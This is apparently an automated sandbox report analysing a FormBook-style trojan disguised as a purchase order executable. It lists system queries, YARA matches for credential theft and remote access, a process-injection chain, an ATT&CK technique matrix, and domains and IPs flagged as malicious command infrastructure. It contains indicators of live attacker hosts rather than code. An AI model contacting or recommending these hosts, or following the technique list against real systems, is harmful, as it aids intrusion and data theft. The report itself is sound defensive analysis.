          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0070DC00 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00707490 RegOpenKeyExW,RegOpenKeyExW,SysFreeString,RegCloseKey,RegCloseKey,WideCharToMultiByte,__alloca_probe_16,WideCharToMultiByte,RegOpenKeyExA,GetLastError,RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0070A9C0 InitializeCriticalSection,GetVersionExA
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00715880 CreateBindCtx,MkParseDisplayName
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0070CD6C CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 612 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 131 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 41 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 612 Process Injection | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | 1 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | 124 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          [Behavior graph. ID: 1422056; Sample: Purchase Order#23113.exe; Startdate: 08/04/2024; Architecture: WINDOWS; Score: 100. Process chain: Purchase Order#23113.exe (started) -> Purchase Order#23113.exe (started) -> explorer.exe (injected) -> cscript.exe (started) -> cmd.exe (started) -> conhost.exe (started).]

          Source | Detection | Scanner | Label | Link
          Purchase Order#23113.exe | 32% | ReversingLabs | Win32.Trojan.Generic |
          Purchase Order#23113.exe | 39% | Virustotal | | Browse
          Purchase Order#23113.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
                                                      high
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.xaqh.info/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.gratiasempirellc.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.brandonbirk.com/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mingshengglass.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.sampleshubusa.com/vr01/www.topdeals.bizexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.owletbaby.shopReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.xaqh.info/vr01/www.mingshengglass.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://outlook.com_explorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            low
                                                            http://www.kidscircle.shop/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.sampleshubusa.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.owletbaby.shop/vr01/www.yesxoit.xyzexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.sampleshubusa.com/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.massagechairspecialists.com/vr01/www.mks-digital.netexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.mingshengglass.com/vr01/www.yoursweets.onlineexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fontbureau.com/designersGPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.yesxoit.xyzexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.mingshengglass.com/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/?Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cn/bThePurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers?Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.tiro.comPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.goodfont.co.krPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.microexplorer.exe, 00000003.00000000.1779124228.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1776990412.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1776251589.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.gratiasempirellc.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.yoursweets.online/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://www.typography.netDPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
66.235.200.146 | snugandkind.com | United States | 13335 | CLOUDFLARENETUS | true
13.248.169.48 | www.owletbaby.shop | United States | 16509 | AMAZON-02US | true
102.134.40.151 | www.mingshengglass.com | South Africa | 328543 | sun-asnSC | true
198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
45.76.63.192 | studioenginedemo.com | United States | 20473 | AS-CHOOPAUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
172.67.165.166 | www.xaqh.info | United States | 13335 | CLOUDFLARENETUS | true
66.147.240.91 | oregonjobs.co | United States | 46606 | UNIFIEDLAYER-AS-1US | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1422056
Start date and time: 2024-04-08 10:01:48 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Purchase Order#23113.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/1@11/8
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 167
• Number of non-executed functions: 328
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
10:02:47 | API Interceptor | 1x Sleep call for process: Purchase Order#23113.exe modified
10:02:55 | API Interceptor | 9355456x Sleep call for process: explorer.exe modified
10:03:30 | API Interceptor | 8174238x Sleep call for process: cscript.exe modified
                                                                          • 23.227.38.74
                                                                          fvdsoH9LQneIhQP.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 23.227.38.74
                                                                          General Specifications - INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 23.227.38.74
                                                                          Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 23.227.38.74
                                                                          ext-sq.squarespace.com0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 198.185.159.144
                                                                          LF20240228.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          Factura379292.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 198.185.159.144
                                                                          GSO3357.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 198.185.159.144
                                                                          D05285734 DHL.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          SQUARESPACEUS0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
